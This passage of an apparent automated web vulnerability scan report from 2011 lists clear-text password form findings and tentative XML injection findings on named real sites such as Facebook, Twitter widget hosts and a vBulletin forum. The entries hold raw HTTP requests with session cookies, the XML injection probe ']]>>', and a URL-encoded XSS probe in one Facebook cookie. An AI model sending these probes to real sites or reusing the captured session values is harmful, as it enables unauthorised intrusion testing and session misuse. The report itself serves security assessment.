X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 54583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.23. http://top-sec.net/vb/sendmessage.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/sendmessage.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vb/sendmessage.php HTTP/1.1
Host: top-sec.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131; bblastactivity=0

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 02:09:31 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 02:09:31 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Content-Type: text/html; charset=windows-1256
Content-Length: 39117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.24. http://top-sec.net/vb/showgroups.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/showgroups.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vb/showgroups.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:56 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:56 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:56 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 50015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.25. http://top-sec.net/vb/showthread.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/showthread.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vb/showthread.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:56 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:57 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:57 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 47808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.26. http://top-sec.net/vb/tags.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/tags.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vb/tags.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:57 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:57 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:57 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 36821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.27. http://www.facebook.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

8.28. http://www.facebook.com/r.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.252.126
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 29390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

8.29. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:41 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:41 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</h3>


<form action="#comments" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
   <div id="cmttabs">
...[SNIP]...
<br />
       <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/></label>
...[SNIP]...

8.30. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:18 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:17 GMT; path=/
Content-Type: text/html
Content-Length: 63415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</h3>


<form action="#comments" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
   <div id="cmttabs">
...[SNIP]...
<br />
       <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/></label>
...[SNIP]...

9. XML injection
There are 11 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose that the relevant input serves within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


9.1. http://jb.speakertext.com/player/speakertext.css [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://jb.speakertext.com
Path:   /player/speakertext.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /player]]>>/speakertext.css?ver=MU HTTP/1.1
Host: jb.speakertext.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 038D24CD571B18A1
x-amz-id-2: 7naTM3ed3SWLL3cYgw6RKthpaVBs5uJ59vqJBHZVrRMvoDyvoHyaSsDoXJOqS35k
Content-Type: application/xml
Date: Thu, 05 May 2011 01:19:48 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>038D24CD571B18A1</RequestId><HostId>7naTM3ed3SWLL3cYgw6RKthpaVBs5uJ59vqJBHZVrRMvoDyvoH
...[SNIP]...

9.2. http://jb.speakertext.com/player/speakertext.css [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://jb.speakertext.com
Path:   /player/speakertext.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /player/speakertext.css]]>>?ver=MU HTTP/1.1
Host: jb.speakertext.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 9233A4E4EBE7FCE9
x-amz-id-2: d+F1roNSInSZTY3lL/t8kiFRCyYvMBbki/FyumBOU7NPco+CBU3qY48AhHyOpYJz
Content-Type: application/xml
Date: Thu, 05 May 2011 01:19:51 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9233A4E4EBE7FCE9</RequestId><HostId>d+F1roNSInSZTY3lL/t8kiFRCyYvMBbki/FyumBOU7NPco+CBU
...[SNIP]...

9.3. http://pixel.quantserve.com/seg/r [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://pixel.quantserve.com
Path:   /seg/r

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /seg]]>>/r;a=p-54JT4Ioyi-32M;rand=1304557128;redirect=http://ads.undertone.com/fc.php?dp=8&pid=!qcsegs HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EBYAGO8kjVmtjIMIufKMgQG0AQHWBoHzAJrRo6lXiz0dKj2VMAiz0dSizF8QGjTBH-EQQBwSAAADBAGFoogRu2CWsYNcdDECEYILsywS0zgSggMC4a4w_xkgDokgDhAL4gtksQgtGLKxlKOLIw

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 345
Date: Thu, 05 May 2011 01:25:05 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.4. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform0.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/tweet_button.html?_=1304575123514&count=horizontal&counturl=http%3A%2F%2Ftechcrunch.com%2F2011%2F05%2F04%2Fmashery-funding-2%2F&lang=en&related=parislemon%3AAuthor%20of%20the%20post&text=100%2C000%20Developers%20Strong%2C%20Mashery%20Nabs%20%2411%20Million%20To%20Push%20The%20Internet%20Beyond%C2%A0Websites&url=http%3A%2F%2Ftcrn.ch%2Fk1UgaS&via=techcrunch HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1304470443436909

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Thu, 05 May 2011 01:23:36 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]&gt;&gt;/tweet_button.html</Key><RequestId>BCB94C009E887B79</Reque
...[SNIP]...

9.5. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform0.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/tweet_button.html]]>>?_=1304575123514&count=horizontal&counturl=http%3A%2F%2Ftechcrunch.com%2F2011%2F05%2F04%2Fmashery-funding-2%2F&lang=en&related=parislemon%3AAuthor%20of%20the%20post&text=100%2C000%20Developers%20Strong%2C%20Mashery%20Nabs%20%2411%20Million%20To%20Push%20The%20Internet%20Beyond%C2%A0Websites&url=http%3A%2F%2Ftcrn.ch%2Fk1UgaS&via=techcrunch HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1304470443436909

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Thu, 05 May 2011 01:23:38 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/tweet_button.html]]&gt;&gt;</Key><RequestId>F717764FD2EDB0E1</Reque
...[SNIP]...

9.6. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform1.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/tweet_button.html?_=1304575123516&count=horizontal&counturl=http%3A%2F%2Fwww.crunchgear.com%2F2011%2F05%2F04%2Fcontest-away-put-your-weapon-i-mean-you-to-win-a-star-wars-prize%2F&lang=en&related=johnbiggs%3AAuthor%20of%20the%20post&text=Contest%3A%20Away%20Put%20Your%20Weapon%2C%20I%20Mean%20You%20To%20Win%20A%20Star%20Wars%C2%A0Prize&url=http%3A%2F%2Ftcrn.ch%2Fli2f8d&via=techcrunch HTTP/1.1
Host: platform1.twitter.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1304470443436909

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Thu, 05 May 2011 01:23:36 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]&gt;&gt;/tweet_button.html</Key><RequestId>8364B37C6F8AC25E</Reque
...[SNIP]...

9.7. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform1.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/tweet_button.html]]>>?_=1304575123516&count=horizontal&counturl=http%3A%2F%2Fwww.crunchgear.com%2F2011%2F05%2F04%2Fcontest-away-put-your-weapon-i-mean-you-to-win-a-star-wars-prize%2F&lang=en&related=johnbiggs%3AAuthor%20of%20the%20post&text=Contest%3A%20Away%20Put%20Your%20Weapon%2C%20I%20Mean%20You%20To%20Win%20A%20Star%20Wars%C2%A0Prize&url=http%3A%2F%2Ftcrn.ch%2Fli2f8d&via=techcrunch HTTP/1.1
Host: platform1.twitter.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1304470443436909

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Thu, 05 May 2011 01:23:38 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/tweet_button.html]]&gt;&gt;</Key><RequestId>EA853DC0A57BDE63</Reque
...[SNIP]...

